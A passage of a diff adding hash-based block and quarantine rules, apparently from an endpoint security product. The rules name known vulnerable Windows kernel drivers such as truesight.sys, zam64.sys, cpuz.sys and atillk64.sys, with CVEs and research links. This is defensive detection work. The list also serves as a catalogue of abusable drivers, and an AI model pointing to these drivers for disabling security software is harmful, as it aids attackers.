+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a32387ad-cc7e-5973-a3ce-0241204f2fe3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812222Z",
+ "creation_date": "2026-03-23T11:45:31.812224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "593ecfd5831961c85af43db78d2b89de0e8766627838b958528a3d745f4d47b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a329ac31-42ac-58c1-bf6a-9c8e1dffc5d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614736Z",
+ "creation_date": "2026-03-23T11:45:29.614738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a32b6724-55fd-5bd1-bea6-041d24a8916d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824563Z",
+ "creation_date": "2026-03-23T11:45:31.824565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c1adf6d58c674a77eb875ccb7dc3290148a94609df0dedcb961c1f78ac5bbd0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a32b7f9a-fe93-550d-b41d-ed1b9be70f4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832187Z",
+ "creation_date": "2026-03-23T11:45:30.832189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ce04a15e86044d60813727ddf54465b4a6509d356048ba5c99bd5131c03dd45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3353a34-6600-5f6f-a92e-a5a123f3dbb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829505Z",
+ "creation_date": "2026-03-23T11:45:31.829507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd1ff111e962cd5ddb714bcf49348258ba83726e7c58779ac32ecfebc0377a65",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a342e108-037e-57a2-831b-989bf86ceffa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497984Z",
+ "creation_date": "2026-03-23T11:45:31.497987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "814edc8773210d0ee42edea1d31884a3595fd6a0c366fbe383e8b389658373b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a34dcdbb-ff26-557a-917c-74411cd7e0eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489306Z",
+ "creation_date": "2026-03-23T11:45:31.489309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0b254882e39d7888ae195eca0be81ea95ca6f21e522d2afeaf6be0426324055",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a360d8ef-67ec-59cb-b31a-2125779be047",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971506Z",
+ "creation_date": "2026-03-23T11:45:29.971508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ceb1bf90d8652dac481fba362e5c3a6548a116897e729733f2be27f4edc5fc1f",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a36693c2-9e06-5e6d-b242-e5805e264d99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144090Z",
+ "creation_date": "2026-03-23T11:45:31.144092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05c84614bb901b97087dd7d44c839e5dae95982eae8bd8b2e8f354aff8e4c551",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a367a6f5-fd09-5ec2-8f28-4d003d586ca1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829451Z",
+ "creation_date": "2026-03-23T11:45:31.829453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fec113f2164c7c0570b4e465488812beb4000e97d19844b87e4540f9c3c3dc43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a36817f6-436b-545a-af02-57748ebdfa9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819840Z",
+ "creation_date": "2026-03-23T11:45:31.819843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2224d56a26690856ecc3ee84eecd389a30e530863432d39303356a3e40557d9f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a36b6e88-d531-5679-b4cd-ddd7f351b827",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458051Z",
+ "creation_date": "2026-03-23T11:45:30.458054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca34f945117ec853a713183fa4e8cf85ea0c2c49ca26e73d869fee021f7b491d",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a373e9a8-f486-5ace-ae42-58e91460c06e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474359Z",
+ "creation_date": "2026-03-23T11:45:30.474362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "330941d4b4c310814278afb3d07f7191470c7da06f694342797dc6a2eb37c5be",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a376fab5-1320-517a-b421-48fdf32344d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142185Z",
+ "creation_date": "2026-03-23T11:45:31.142187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3be5749132be41e14fad0b9b0bbfbcaf2bcaff3aa1475ebb45195dce47c25506",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a378fa8e-d59e-5a75-adb4-e0579451cdb7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611411Z",
+ "creation_date": "2026-03-23T11:45:29.611412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e9099b95b2074fecc6efa6d59552651b1e082aaa3612889f417064d378a797f",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a37ae96a-2f21-5b90-b5d0-df43e2fb5765",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813721Z",
+ "creation_date": "2026-03-23T11:45:31.813723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0de1e090b5ab2d423652760275bee65b5544a9261165dada553ef83f60f4a2f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a37b5bb8-c511-53ff-82ec-64aa282c4459",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474895Z",
+ "creation_date": "2026-03-23T11:45:30.474898Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81017af32ebdaf0bc0878a8057bc6b8bd3848eb21aca324cd56b27faa1df7377",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a385a5d2-3ed7-5e12-8dab-dae3c1b1acb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829358Z",
+ "creation_date": "2026-03-23T11:45:30.829360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd83141ba59a56b674157ef969c9217c62ca3199f498cf4ea32e4010cceae49d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a38b8307-e518-5612-90e2-11824c13fdcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456781Z",
+ "creation_date": "2026-03-23T11:45:30.456784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2e1a3dd0dfb3477a3e855368b23d12b8818df8fa3bc3508abf069a0873d6bf8",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a390c2d9-5b85-58da-bbe5-f3319e88fd5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818559Z",
+ "creation_date": "2026-03-23T11:45:30.818561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818567Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "748ccadb6bf6cdf4c5a5a1bb9950ee167d8b27c5817da71d38e2bc922ffce73d",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a392be01-da71-5d6d-b087-f3fadea0aa13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484933Z",
+ "creation_date": "2026-03-23T11:45:31.484937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1416327acf720388fef7728b808a47db061d0bc98798aa3250ab8d724e2e493d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a395f25f-69e3-5eb4-b662-1a691a5365c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617555Z",
+ "creation_date": "2026-03-23T11:45:29.617557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a29adcc53553499e1c72bfa6595c94284aeb1d68552f964d90d03fa304df4fbf",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
